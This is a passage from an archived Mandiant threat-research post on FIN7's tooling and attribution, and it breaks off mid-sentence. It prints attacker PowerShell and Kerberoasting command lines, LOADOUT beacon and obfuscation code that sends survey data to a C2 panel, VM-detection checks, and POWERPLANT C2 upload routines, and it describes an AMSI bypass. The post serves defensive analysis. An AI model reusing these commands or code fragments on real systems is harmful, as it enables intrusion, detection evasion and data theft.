{ "id": "1b97e8f4-ce0d-412f-8cd7-fd3d04bc8861", "created_at": "2026-04-06T00:08:35.47603Z", "updated_at": "2026-04-10T03:35:53.067854Z", "deleted_at": null, "sha1_hash": "c55324769777bee7344616b11f5823104754d75c", "title": "FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7 | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1010599, "plain_text": "FIN7 Power Hour: Adversary Archaeology and the Evolution of\r\nFIN7 | Mandiant\r\nBy Mandiant\r\nPublished: 2022-04-04 · Archived: 2026-04-05 21:25:12 UTC\r\nWritten by: Bryce Abdo, Zander Work, Ioana Teaca, Brendan McKeague\r\nRecent public research asserts threat groups sharing overlaps with FIN7 transitioned to targeted ransomware\r\noperations involving REVIL, DARKSIDE, BLACKMATTER, and ALPHV ransomware. With the purported shift\r\nto ransomware operations, Mandiant is publishing our research on the evolution of FIN7 which we haven’t\r\npublicly written about since Mahalo FIN7, published in 2019.\r\nThis blog post draws on organic research from both historical and recent intrusions that Mandiant directly\r\ninvestigated, and describes the process of merging multiple UNC groups into FIN7. This process allowed us to\r\nmerge eight previously suspected UNC groups into FIN7 in January 2022. We also highlight notable shifts in\r\nFIN7 activity over this time, including their use of novel malware, incorporation of new initial access vectors, and\r\nlikely shift in monetization strategies.\r\nFIN7 continued to leverage PowerShell throughout their intrusions, including in a new backdoor called\r\nPOWERPLANT, which FIN7 has continually developed over the last two years. We also identified new\r\nversions of the BIRDWATCH downloader being developed, which are tracked as CROWVIEW and\r\nFOWLGAZE.\r\nFIN7’s initial access techniques have diversified to include software supply chain compromise and the use\r\nof stolen credentials, in addition to their traditional phishing techniques. We also observed FIN7 use\r\nPOWERPLANT as their first stage malware instead of LOADOUT and/or GRIFFON in newer intrusions.\r\nData theft extortion or ransomware deployment following FIN7-attributed activity at multiple\r\norganizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various\r\nransomware operations over time.\r\nMandiant is also tracking multiple, notable campaigns as separate UNC groups that we suspect are FIN7,\r\nincluding a “BadUSB” campaign leading to DICELOADER, and multiple phishing campaigns leveraging\r\ncloud marketing platforms leading to BIRDWATCH.\r\nWe first disclosed threat reporting and publicized research on FIN7 in 2017. Since then, we’ve published multiple\r\nblog posts on FIN7 operations, with more extensive content available on Mandiant Advantage. In this blog post,\r\nwe focus on examining the most recent FIN7 intrusion operations, as well as the attribution methodologies that we\r\nused.\r\nThreat Attribution Over Time\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 1 of 27\n\nOur attribution methodology requires multiple layers of overlaps within collected threat data to merge suspected\r\nFIN7 UNC groups into our core FIN7 cluster. Merge evidence is sourced from analysis of attacker infrastructure,\r\nintrusion tradecraft, modus operandi, and how specific code is employed by the groups we research. Rigorous\r\ndocumentation of technical evidence is critical for modern cybercrime attribution, when considering the fluid and\r\nopportunistic nature of cybercriminal operations, as well as individual operators’ narrow allegiances to criminal\r\norganizations. It is also common for us to observe multiple threat groups engaging in intrusion operations within\r\nclose temporal proximity, sometimes even using the same access method within hours or minutes of each other.\r\nThis is especially notable in the ransomware ecosystem, where Mandiant has observed individual members shift\r\nteams, and teams migrate between affiliate programs commonly adopting different TTPs across intrusions\r\ndepending on who they are collaborating with or gaining access from at a given time.\r\nTo date, we suspect 17 additional UNCs of being affiliated with FIN7 with varying levels of confidence; however,\r\nthose groups have not been formally merged into FIN7. Those groups’ activity spans as far back as 2015 and as\r\nrecently as late 2021, across 36 separate intrusions. Eight previously suspected FIN7 UNC groups, active since\r\n2020, have recently been merged into FIN7, confirming the resilience of actors associated with the threat group.\r\n2020 Activity Brief: Heavy on the LOADOUT\r\nFIN7 was active during the spring and summer of 2020, conducting phishing campaigns and attempting to\r\ndistribute LOADOUT and GRIFFON. During that time, five UNC groups were created to track various\r\ncampaigns, which eventually were merged into our new splinter group of FIN7, following merge analysis later in\r\n2021 that expanded our understanding of FIN7. The impacts of related UNC merges for 2020 activity added usage\r\nof code families LOADOUT, TAKEOUT and a BIRDWATCH variant into FIN7.\r\nFigure 1: FIN7 Activity in 2020-2021\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 2 of 27\n\nLOADOUT is an obfuscated VBScript-based downloader which harvests extensive information from the infected\r\nsystem. The harvested information is then sent to a command-and-control (C2) server. C2 server responses for\r\nLOADOUT infections delivered GRIFFON, a JavaScript-based downloader which retrieves additional JavaScript\r\nmodules using HTTP or DNS and executes them in memory.\r\nIn late summer of 2020, FIN7 capped off their busy year with the first observed usage of POWERPLANT.\r\nPOWERPLANT, also referred to as “KillACK”, is a PowerShell-based backdoor with a breadth of capabilities,\r\ninitially delivered following a successful GRIFFON infection in August 2020. Merges involving the usage of\r\nPOWERPLANT into 2021 led us to assess that FIN7 is likely the only operator using POWERPLANT.\r\n2021 Activity Brief: A Shift to POWERPLANT\r\nWe identified an uptick in FIN7-suspected UNC group activity during 2021 across five intrusions, beginning in\r\nApril of 2021. The uptick led us to initiate a deep-dive research effort into FIN7. We also observed FIN7 shift\r\ntheir initial access techniques away from using LOADOUT, GRIFFON or CARBANAK in favor of direct\r\ndeployment of POWERPLANT and BEACON. Specifically, FIN7 used POWERPLANT in all observed\r\nintrusions in 2021. FIN7 also relied on BEACON as a secondary mode of access alongside some POWERPLANT\r\ninfections.\r\nThroughout 2021 we scrutinized a multitude of FIN7-linked UNC groups to our breadth of past FIN7 intelligence\r\nholdings, merging multiple threat clusters along the way. Our research revealed a fusion of older FIN7 intrusion\r\ntradecraft, and new FIN7 malware.\r\nPowerShell Archaeology: FIN7 Habits Die Hard\r\nThere is no doubt about it, PowerShell is FIN7’s love language. FIN7 has implemented malware into its offensive\r\noperations using many programming languages; however, during on-system interactions, FIN7’s preference for\r\nboutique PowerShell-based loaders and unique PowerShell commands is dominant.\r\nOur deep dive into prior FIN7 intrusions dating as far back as 2019 bubbled up several long-standing patterns of\r\nunique PowerShell invocations still being used today. In the first example, command lines, such as in Figure 2 and\r\nFigure 3, had overall low-global prevalence outside of FIN7 and suspected FIN7 UNCs.\r\ncmd.exe /c start %SYSTEMROOT%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noni\r\n-nop -exe bypass -f \u003cREDACTED\u003e/ADMIN$/temp/wO9EBGmDqwdc.ps1\r\nFigure 2: FIN7 PowerShell Execution from 2019\r\ncmd.exe /c start %SYSTEMROOT%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noni\r\n-nop -exe bypass -f \\\\\u003cREDACTED\u003e\\Admin$\\c5k3fsys.3bp.ps1\r\nFigure 3: FIN7 PowerShell Execution from 2021\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 3 of 27\n\nThe unique aspect in the Figure 2 and Figure 3 commands is the distinct parameters -noni -nop -exe bypass -f, for\r\nlaunching scripts located in Admin shares and installing Windows services. Since 2019, we have observed FIN7\r\nuse command line parameters such as these while interacting with victim systems through backdoor malware such\r\nas CARBANAK. We have since seen a shift of some of these distinct PowerShell commands being initiated\r\nthrough POWERPLANT infections.\r\nSmaller patterns and consistencies across FIN7 intrusions from 2019 and beyond reveal more distinct PowerShell\r\ncommand lines using -ex bypass -f or -ex bypass -fileas passed parameters. Although those patterns appear\r\nmodest to hunt for, the combinations have extremely low global prevalence outside of FIN7-associated threat\r\nactivity. For example, the first command line pattern has been seen over 2800 times, all of which were events\r\nattributed to FIN7. The second command line pattern has been seen nearly 250 separate times at 10 different\r\nvictims as far back as 2019, all of which were FIN7 attributed commands.\r\npowershell.exe -ex bypass -file C:\\windows\\temp\\fdddu32.ps1\r\nFigure 4: FIN7 PowerShell Execution from 2019\r\npowershell.exe -ex bypass -f c:\\users\\public\\temp\\AC-Win10w-x64.ps1\r\npowershell.exe -ex bypass -f C:\\Users\\Public\\Videos\\AC-Bot-x64.ps1\r\nFigure 5: FIN7 PowerShell Execution from 2020\r\npowershell.exe -ex bypass -f pkit.ps1\r\npowershell.exe -ex bypass -f cube.ps1\r\nFigure 6: FIN7 PowerShell Executions from 2021\r\nIn addition to FIN7’s unique command lines during intrusion operations, we identified long-standing usage of\r\nother PowerShell code families, such as POWERTRASH. POWERTRASH is an in-memory dropper, or loader,\r\nwritten in PowerShell that executes an embedded payload. Observed payloads loaded by FIN7’s POWERTRASH\r\ninclude CARBANAK, DICELOADER, SUPERSOFT, BEACON and PILLOWMINT. POWERTRASH is a\r\nuniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub.\r\nWith this improved understanding of FIN7 intrusion operations, we assembled our analytical efforts to begin\r\nmerging multiple suspected UNCs into FIN7. As part of this initiative, we identified new FIN7 missions targeting\r\nour customers, including a Managed Defense Rapid Response engagement in 2021.\r\nManaging a Defense\r\nFIN7 has targeted a broad spectrum of organizations in multiple industries, including Software, Consulting,\r\nFinancial Services, Medical Equipment, Cloud Services, Media, Food and Beverage, Transportation, and Utilities.\r\nWe identified over a dozen intrusions attributed to FIN7 since 2020 across our client base. The following use case\r\nprofiles recent FIN7 tradecraft during a Mandiant Managed Defense engagement in 2021.\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 4 of 27\n\nFIN7 From the Trenches\r\nTo obtain initial access during this intrusion, FIN7 used compromised Remote Desktop Protocol (RDP)\r\ncredentials to login to a target server across two separate days, and initiated two similar Windows process chains\r\n(Figure 7).\r\nrdpinit.exe\r\n ↳ notepad++.exe\r\n ↳ cmd.exe\r\n ↳ powershell.exe\r\n rdpinit.exe\r\n ↳ notepad++.exe\r\n ↳ cmd.exe\r\n ↳ rundll32.exe\r\nFigure 7: Two FIN7 process event chains\r\nFIN7 used established RDP access to eventually install other modes of host control, first by executing PowerShell\r\nreconnaissance scripts, then by executing a TERMITE loader (Figure 8).\r\nRunDll32 TstDll.dll,TstSec 11985756\r\nFigure 8: Command line used to load FIN7 TERMITE\r\nTERMITE is a password-protected shellcode loader which we have observed at least seven distinct threat groups\r\nuse to load BEACON, METASPLOIT, and BUGHATCH shellcodes. FIN7 used TERMITE to load and execute a\r\nshellcode stager for Cobalt Strike BEACON in this case.\r\nFollowing secondary access of BEACON, FIN7 began further enumeration using built-in Windows commands as\r\nwell as POWERSPLOIT and Kerberoasting PowerShell modules.\r\ncmd.exe /C net group \"Domain Admins\" /domain\r\ncmd.exe /C quser\r\npowershell.exe -c import-module C:\\Users\\Public\\kerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat HashCat \u003e ha\r\npowershell.exe -ex bypass -c import-module C:\\Users\\Public\\kerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat H\r\npowershell.exe -ex bypass -f pkit.ps1\r\nAfter the initial reconnaissance using RDP and BEACON, FIN7 executed an obfuscated loader for a victim-customized variant of the PowerShell-based backdoor POWERPLANT, providing tertiary access:\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 5 of 27\n\npowershell.exe -ex bypass -f cube.ps1\r\nFIN7 then attempted to steal credentials and further compromise the victims’ environment with limited success, as\r\nthe client was able to respond and quickly remediate with the advantage of Managed Defense responders.\r\nA unique aspect of this specific intrusion perfectly highlighted the challenges of technical attribution for\r\ncybercriminal threats: Between the two days of FIN7 operations on the victim system, FIN12 was also active on\r\nthe same victim for multiple hours using the same RDP account, but much different infrastructure and tradecraft,\r\nattempting to install BEACON using the WEIRDLOOP in-memory dropper before the intrusion was remediated.\r\nFIN7’s Evasion\r\nAmong FIN7’s historical trademarks were their creative obfuscation and fast development of evasive techniques.\r\nThis is still the case, with FIN7 first stage droppers and downloaders being heavily obfuscated. LOADOUT in\r\nparticular, due to its wide distribution in opportunistic campaigns, has been through several iterations meant to\r\nimprove evasion.\r\nThe initial obfuscation mechanism was basic but effective at evading static detections: the malicious code was\r\ninterspersed with random junk code (Figure 9). After a few months of successful campaigning, AV detection\r\nengines improved coverage of the downloader. To get around this, and to send a message, LOADOUT\r\ndeveloper(s) broke up the beacon suspected to be used in detection signatures by simply inserting “FUCKAV” into\r\nthe strings (Figure 8).\r\ndata = \"id=\" \u0026 get_id() \u0026 \"\u0026FUCKAVtype=put\" \u0026 get_computer_info(\"\") \u0026 \"\u0026DomainHosts=\" \u0026 count_domain_hosts() \u0026\r\nresponse = send(panel_url, data)\r\nif response = \"okFUCKAV\" then\r\n js = send(panel_url, \"\")\r\n run_js(js)\r\nend ifFUCKAV\r\nFigure 8: System survey information sent as beacon by LOADOUT\r\nkiki=ado.ReadText\r\n' OE5QAJ2VaFCK F5\r\nDim yiups\r\nyiups = \"UTo\"\r\nWScript.Echo(\" error \")\r\nkok = replace(kiki, \"FUCKAV\", \"\")\r\nulpo = \"12\"\r\naoso = year(\"01/07/12\")\r\nif right(aoso, 2) = ulpo then\r\nexecute(\"WScript.Echo(\"\" file is corrupted \"\"):\" \u0026 kok)\r\nend if\r\n'hello bitchw\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 6 of 27\n\nFigure 9: LOADOUT obfuscation\r\nIndeed, the developer(s) was correct to be suspicious that these strings were being used for detection. By pivoting\r\non the beacon, we discovered a new, work-in-progress variant of LOADOUT submitted to VirusTotal (MD5:\r\n485b2a920f3b5ae7cfad93a4120ec20d), detected by only one engine (Figure 10). Two hours later, a new version\r\nwas submitted (MD5: 012e7b4d6b5cb8d46771852c66c71d6d), this time with the offending PowerShell command\r\nobscured through their custom obfuscation mechanism (Figure 11).\r\n objTS.WriteLine(TextCrypt)\r\n objTS.Close\r\n pwsh_command = \"powershell.exe -executionpolicy bypass -file \" \u0026 FileName \u0026 \".ps1\"\r\n objWSH.Run pwsh_command, 0, True\r\n FSO.DeleteFile FileName \u0026 \".ps1\"\r\nFigure 10: PowerShell command before obfuscation\r\n Text1 = \"/3/3.1/2.1,7/2/2.0/3+4+5/4/2*3,7.0,7/2/2.1/4.0,6/3/3.0/3.0+5/4+5-9/4.1+5/4/3*3,7.0,6\r\n261416272214202710112212232310\"\r\n TextCrypt = Encryption(MakeCryptoText(TextUnShifter(Text1)), False)\r\n pwsh_command = TextCrypt \u0026 FileName \u0026 \".ps1\"\r\n objWSH.Run pwsh_command, 0, True\r\n FSO.DeleteFile FileName \u0026 \".ps1\"\r\nFigure 11: PowerShell command obfuscation\r\nFIN7 actors have historically tested their tools against public repositories to check static detection engine\r\ncoverage. It is likely that in this case, they were testing the strength of their custom obfuscation.\r\nThis new and improved version of LOADOUT emerged five months later. It was refactored to add multiple layers\r\nof obfuscation, including interspersed Bible verses as filler text, and string obfuscation through a custom\r\nmechanism (Figure 12).\r\nPrivate Function GetShiftKey()\r\nOn Error Resume Next\r\nSet Key = CreateObject(\"Scripting.Dictionary\")\r\nl = Len(CryptoKey\r\ni1 = 0\r\n With Key\r\n For i = 1 To l\r\n s = Mid(CryptoKey, i, 1)\r\n n = (Asc(s) Mod 8) + 1\r\n If Not .Exists(n) Then\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 7 of 27\n\n.Add n, n\r\n i1 = i1 + 1\r\n End If\r\n If i1 = 9 Then Exit For\r\n Next\r\n If i \u003e= l And i1 \u003c 9 Then\r\n For i = 1 + 1 To 8\r\n If Not .Exists(i) Then\r\n .Add i, i\r\n End If\r\n Next\r\n End If\r\n For i = 1 To 8\r\n GetShiftKey = GetShiftKey + .Items()(i)\r\n Next\r\n End With\r\nEnd Function\r\nPrivate Function TextShifter(txt)\r\n Dim nKeys(), out()\r\n Key = GetShiftKey\r\n n = Len(Key)\r\n If n = 0 Then Exit Function\r\n l = Len(txt)\r\n m = -Int(-l / n)\r\n ReDim nKeys(n)\r\n For i = 1 To n\r\n s1 = Mid(Key, i, 1)\r\n For j = 1 To n\r\n s2 = Mid(Key, j, 1)\r\n If s1 \u003e s2 Or (s1 = s2 And j \u003c= i) Then\r\n nKeys(i) = nKeys(i) + 1\r\n End If\r\n Next\r\n Next\r\n ReDim out(n * m)\r\n For i = 1 To Len(txt)\r\n out(nKeys((i - 1) Mod n + 1) * m + (i - 1) \\ n - m + 1) = Mid(txt, i, 1)\r\n Next\r\n TextShifter = Join(out, \"\")\r\nEnd Function\r\nFigure 12: LOADOUT custom string obfuscation\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 8 of 27\n\nPOWERPLANT: FIN7’s PowerShell Workhorse\r\nFIN7 has leveraged multiple methods of initial and secondary access into victim networks including phishing,\r\ncompromising third-party systems, Atera agent installers, GoToAssist, and RDP. In a recent case, FIN7 actors\r\ncompromised a website that sells digital products and modified multiple download links to point to an Amazon S3\r\nbucket hosting trojanized versions, containing an Atera agent installer. This remote management tool was later\r\nused to deploy POWERPLANT to the victim system. This was the first time Mandiant observed FIN7 leverage\r\nsupply chain compromise. FIN7’s time-tested CARBANAK and DICELOADER (also known as Lizar) malware\r\ncontinue to be in use; however, we have noticed FIN7 depend more on the POWERPLANT backdoor during\r\nrecent intrusions.\r\nOur research into POWERPLANT has revealed that it is a vast backdoor framework with a breadth of capabilities,\r\ndepending on which modules are delivered from the C2 server. POWERPLANT backdoors contain internal\r\nversion identifiers within the code. We have identified samples ranging from version “0.012” through “0.028”,\r\nwith examples shown in Table 1.\r\nPOWERPLANT Sample MD5 Version\r\n5a6bbcc1e44d3a612222df5238f5e7a8 0.012\r\n0291df4f7303775225c4044c8f054360 0.016\r\n3803c82c1b2e28e3e6cca3ca73e6cce7 0.019\r\nd1d8902b499b5938404f8cece2918d3d 0.021(TLS1)\r\n833ae560a2347d5daf05d1f670a40c54 0.021b(SVC)\r\nedb1f62230123abf88231fc1a7190b60 0.021c(SVC)\r\nbce9b919fa97e2429d14f255acfb18b4 0.022\r\nb637d33dbb951e7ad7fa198cbc9f78bc 0.025\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 9 of 27\n\n2cbb015d4c579e464d157faa16994f86 0.028\r\nTable 1: POWERPLANT samples\r\nThe rate of increase in these internal version numbers over time suggests that FIN7 is actively developing\r\nPOWERPLANT (Figure 13). In one engagement, we observed FIN7 deploy incremented versions of\r\nPOWERPLANT with tweaked functionality to targets in the middle of intrusion operations. During that\r\nengagement, versions “0.023” and “0.025” were both used within a 10-minute timeframe. Each version we have\r\nidentified implements overall similar functionality with some programmatic improvements and features added\r\nover time.\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 10 of 27\n\nFigure 13: POWERPLANT version numbers\r\nMandiant also recovered portions of server-side code components from POWERPLANT controllers. Some of\r\nthese components contain clues that hint at the operational security mindfulness of the malware’s developers. Two\r\nsuch examples are FIN7 being aware of researchers investigating their infrastructure, and employing capabilities\r\nto ban target host aspects such as usernames from the panel.\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 11 of 27\n\ncheck_username\r\ncheck_hostdomain\r\ncheck_hostname\r\ncheck_hosts\r\ncheck_researcher\r\ncheck_desktop\r\nFigure 14: Snippet of functions from POWERPLANT Server Settings\r\n if (res) {\r\n localStorage.setItem('success-add-username', 'success-add-username-to-blacklist');\r\n location.reload();\r\n }\r\n },\r\nFigure 15: Snippet of functions from POWERPLANT Server Settings\r\n /**\r\n * Инициализация\r\n */\r\n init() {\r\n this.config();\r\n this.events();\r\n },\r\n \r\n /**\r\n * Конфиги\r\n */\r\n config() {\r\n this.config = {\r\n window: $(window),\r\n document: $(document),\r\n content: $('#content'),\r\n lastUrl: null,\r\n isPage: true,\r\n isModal: false,\r\n intervalId: null,\r\n timer: null,\r\n selectedBots: []\r\n };\r\n }\r\nFigure 16: Snippet of functions from POWERPLANT Server Configuration\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 12 of 27\n\nDuring active C2 sessions, POWERPLANT servers will send multiple additional module types as “tasks” for\r\ntarget systems to execute. Two of these modules are EASYLOOK and BOATLAUNCH.\r\nEASYLOOK Module\r\nEASYLOOK is a reconnaissance utility that FIN7 has used since at least 2019. EASYLOOK captures a wide\r\nrange of data from infected systems, including operating system version, registration key, system name, username,\r\ndomain information, and hardware specifications.\r\nThe initial version of EASYLOOK was delivered by a GRIFFON C2 server and written in JScript (Figure 18).\r\nFIN7’s updated variation of EASYLOOK was delivered by a POWERPLANT variant C2 server and written in\r\nPowerShell (Figure 17). Both versions implemented the exact same functionality across two code languages,\r\nincluding the typo “bios_versoin”.\r\nfunction is_wm {\r\n $bios = Get-WMIObject Win32_Bios\r\n $SerialNumber = $bios.SerialNumber\r\n $bios_versoin = $bios.SMBIOSBIOSVersion\r\nIf ($SerialNumber.Contains(\"parallels\") -or $SerialNumber.Contains(\"vmware\")) {\r\n return $true\r\n}\r\nIf ($bios_versoin.Contains(\"vmware\") -or $bios_versoin.Contains(\"virtualbox\")) {\r\n return $true\r\n}\r\n return $false\r\n}\r\nFigure 17: VM check from new variant of FIN7 EASYLOOK coded in PowerShell\r\nfunction is_vm () {\r\n var biosRequest = wmi.ExecQuery('SELECT * FROM Win32_BIOS');\r\n var biosItems = new Enumerator(biosRequest);\r\n for (; !biosItems.atEnd(); biosItems.moveNext()) {\r\n var bios_versoin = biosItems.item().SMBIOSBIOSVersion.toLowerCase();\r\n var serial_number = biosItems.item().SerialNumber.toLowerCase();\r\n if(serial_number.indexOf('parallels') \u003e= 0 || serial_number.indexOf('vmware') \u003e= 0) {\r\n return true;\r\n }\r\n if(bios_versoin.indexOf('vmware') \u003e= 0 || bios_versoin.indexOf('virtualbox') \u003e= 0) {\r\n return true;\r\n }\r\n }\r\n return false;\r\n}\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 13 of 27\n\nFigure 18: VM check from first variant of FIN7 EASYLOOK coded in JavaScript\r\nBOATLAUNCH Module\r\nBOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during\r\nintrusion operations. BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass\r\nWindows AntiMalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes,\r\nand for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte\r\ninstruction sequence to always return S_OK.\r\nThe technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both\r\n32bit and 64bit variants of BOATLAUNCH have been observed using the following export directory DLL names\r\n(Table 2).\r\nBOATLAUNCH Bitness                     Export Directory Name                    \r\n32-bit amsi32_kill.dll\r\n64-bit amsi64_kill.dll\r\nTable 2: BOATLAUNCH PE Export Directory Names\r\nThe Curious Cases of BIRDWATCH\r\nOur deep dive also revealed usage of BIRDWATCH and its’ similar variants used by FIN7 and suspected FIN7\r\ngroups such as UNC3381. BIRDWATCH is a .NET-based downloader which retrieves payloads over HTTP,\r\nwriting them to disk and then executing them. BIRDWATCH uploads reconnaissance information from targeted\r\nsystems as well, which includes running processes, software installed, network configuration, web browser\r\ninformation and active directory data.\r\nBIRDWATCH is often referred to collectively as “JssLoader”; however, multiple variations of BIRDWATCH\r\nexist which we track as separate code families. One variant of BIRDWATCH is CROWVIEW, which is also .NET-based, but has enough code differences from prototypical BIRDWATCH that we cluster it separately. Unlike\r\nBIRDWATCH, CROWVIEW can house an embedded payload, can self-delete, supports additional arguments and\r\nstores a slightly different configuration.\r\nFIN7 has implemented similar or exact functionality in different programming languages, observed in various\r\ncode families several times over the past few years. Similar to EASYLOOK, which has both JScript and\r\nPowerShell variants, BIRDWATCH and CROWVIEW have separate versions implemented in C++. This data\r\npoint of code reuse and overlaps aided our technical attribution throughout multiple UNC merges, when combined\r\nwith additional infrastructure and tradecraft analysis.\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 14 of 27\n\nIn this first example, programmatic collection of the BIOS (Basic Input Output System) serial number is shown\r\nacross POWERPLANT and CROWVIEW code families.\r\nprivate static string GetBiosSerial()\r\n{\r\n string result = \"BIOS UNKNOWN\";\r\n try\r\n {\r\n ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSear\r\n ManagementObjectCollection managementObjectCollection = managementObjectSear\r\n foreach (ManagementBaseObject managementBaseObject in managementObjectCollec\r\n {\r\n ManagementObject managementObject = (ManagementObject)mana\r\n result = (string)managementObject[\"SerialNumber\"];\r\n }\r\n }\r\n catch\r\n {\r\n }\r\n return result;\r\n}\r\nFigure 19: C# Code Snippet from FIN7-attributed CROWVIEW, a variant of BIRDWATCH\r\nfunction Get-BiosSerial() {\r\n $sn = \"BIOS UNKNOWN\"\r\n $_sn = \"\"\r\n try {\r\n $mSearcher = Get-WmiObject -Query \"SELECT SerialNumber FROM Win32_BIOS\"\r\n foreach ($o in $mSearcher) {\r\n if ($o.Properties.Name -eq \"SerialNumber\") {\r\n $_sn = $o.Properties.Value\r\n }\r\n }\r\n }\r\n catch {}\r\n if ([String]::IsNullOrEmpty($_sn) -eq $false) { $sn = $_sn }\r\n return \"$sn\";\r\n}\r\nFigure 20: PowerShell Code Snippet from FIN7-attributed POWERPLANT\r\nSystem enumeration data formatting overlaps also exist between FOWLGAZE and EASYLOOK. Both code\r\nfamilies implement near identical system surveys, with the shared usage of keys such as “pc_domain”,\r\n“pc_dns_host_name”, “pc_model” and “no_ad”.\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 15 of 27\n\n{\"host\":\"\u003cHOSTNAME\u003e\", \"domain\": \"\u003cDOMAIN\u003e\", \"user\":\"\u003cUSERNAME\u003e\", \"processes\":\r\n [\u003cPROCESS_LIST\u003e] ,\"desktop_file_list\": [\u003cFILE_LIST\u003e] ,\"adinfo\":\r\n{\"adinformation\":\"no_ad\", \"part_of_domain\":\"no\", \"pc_domain\":\"\",\r\n\"pc_dns_host_name\":\"\", \"pc_model\":\"\"}}\r\nFigure 21: Data Collection JSON Format Snippet of FOWLGAZE(\"JssLoader\")\r\n$result += ('username***' + $env:USERNAME)\r\n $result += ('hostname***' + $env:COMPUTERNAME)\r\n $elevated = $(whoami /groups).Contains(\"12288\")\r\n If ($elevated) {\r\n $result += 'yes'\r\n }\r\n Else {\r\n $result += 'elevated***' + 'no'\r\n }\r\n $ad = get_active_directory_information\r\n if ($ad) {\r\n $result += ('adinformation***' + $ad)\r\n } else {\r\n $result += ('adinformation***no_ad')\r\n }\r\n $csRequest = Get-WmiObject Win32_ComputerSystem\r\n $csRequest.PartOfDomain\r\n If ($csRequest.PartOfDomain) {\r\n $result += ('part_of_domain***yes')\r\n }\r\n else {\r\n $result += ('part_of_domain***no')\r\n }\r\n $result += 'pc_domain***' + $csRequest.Domain\r\n $result += 'pc_dns_host_name***' + $csRequest.DNSHostName\r\n $result += 'pc_model***' + $csRequest.Model\r\nFigure 22: Data Collection Code Snippet of EASYLOOK (Reconnaissance Module)\r\nA final code reuse example is usage of \"theAnswer\", defined as variable within program functionality of POST\r\nrequests to C2 controllers for both CROWVIEW and POWERPLANT, as shown in Figure 23 and Figure 24.\r\npublic void Put(string theAnswer)\r\n{\r\n AppHttp.wCli.QueryString.Clear();\r\n AppHttp.wCli.QueryString.Add(\"type\", \"put\");\r\n string text = Convert.ToBase64String(Encoding.ASCII.GetBytes(AppParams.ProgID)).Replace(\"+\", \"\r\n string text2 = Convert.ToBase64String(Encoding.ASCII.GetBytes(\"put\")).Replace(\"+\", \"***\");\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 16 of 27\n\nstring body = string.Concat(new string[]\r\n {\r\n \"id^^^\",\r\n text,\r\n \"\u0026type^^^\",\r\n text2,\r\n \"\u0026\",\r\n theAnswer\r\n });\r\n string text3 = this.HttpUpload(AppParams.URL_PutAnswer, body);\r\n}\r\nFigure 23: C# Code Snippet from FIN7-attributed CROWVIEW and BIRDWATCH (JssLoader)\r\nFunction Send-ToConsole([String] $theAnswer) {\r\n if ([String]::IsNullOrEmpty($theAnswer)) { return }\r\n $_rc = \"\"\r\n try {\r\n $_wc = New-Object System.Net.WebClient\r\n $_wc.QueryString.Add(\"id\", $script:myID)\r\n $_wc.Headers.Add(\"Content-type\", \"text/html\")\r\n $_wc.Headers.Add(\"Accept\", \"text/html\")\r\n $_rc = $_wc.UploadString($urlConsole, $theAnswer)\r\nFigure 24: PowerShell Code Snippet from FIN7-attributed POWERPLANT\r\nMalware code usage is sometimes considered a primary data point for some public threat attribution.  Code\r\noverlaps by themselves, without sufficient additional data points such as intrusion data and infrastructure, are not\r\nstrong enough for us to fully assess that an UNC group should be merged. Throughout 2021 and well into 2022,\r\nwe have identified and will continue to track multiple newly suspected FIN7 UNCs and their activity moving\r\nforward.\r\nAdditional Recent Activity from Suspected FIN7 UNCs\r\nIn October 2021, Mandiant observed a campaign where actors mailed victim organizations “BadUSB” malicious\r\nUSB devices, primarily targeting U.S.-based organizations. We attribute this campaign to UNC3319, a group\r\nwhich we suspect to be associated with FIN7 with low confidence.\r\nThe USB hardware was programmed to download STONEBOAT, which ultimately installed the DICELOADER\r\nframework on the victim system. STONEBOAT is a previously unseen, .NET-based in-memory dropper which\r\ndecrypts a shellcode payload embedded in it. The payload is then mapped into memory and executed.\r\nSTONEBOAT was observed first loading an intermediary loader called DAVESHELL, which then executed the\r\nfinal DICELOADER payload. DAVESHELL is publicly available, open-source code for a launcher of embedded\r\npayloads. DAVESHELL is used by nearly 30 threat groups including FIN12; however, the implementation of\r\nDAVESHELL shellcode loading DICELOADER was unique to a small cluster of threat activity.\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 17 of 27\n\nAdditionally, we’ve identified multiple phishing campaigns distributing BIRDWATCH that have leveraged\r\ncompromised accounts on various email delivery and marketing platforms, including Maropost, ActiveCampaign,\r\nand Mailjet. We attribute this activity to UNC3381, which is suspected to be FIN7 with low confidence. UNC3381\r\nwas first observed in September 2021, but we’ve identified similar activity leveraging Mailjet dating back to late\r\n2019, suspected to be UNC3381 with high 